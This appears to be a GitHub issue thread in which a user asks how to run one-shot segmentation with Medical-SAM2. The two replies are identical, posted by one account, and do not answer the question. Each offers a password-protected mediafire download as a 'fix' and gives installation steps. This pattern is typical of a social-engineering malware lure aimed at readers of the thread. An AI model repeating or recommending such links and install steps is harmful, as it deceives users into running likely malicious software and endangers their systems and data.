### ISSUE TITLE
one-shot inference

### ISSUE THREAD

**Issue by petersampodrias** [MedicineToken/Medical-SAM2#28]
Hi, congratulations on this amazing project.

I was wondering what's the correct way to perform One-shot segmentation as described in the paper. Are there any examples?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
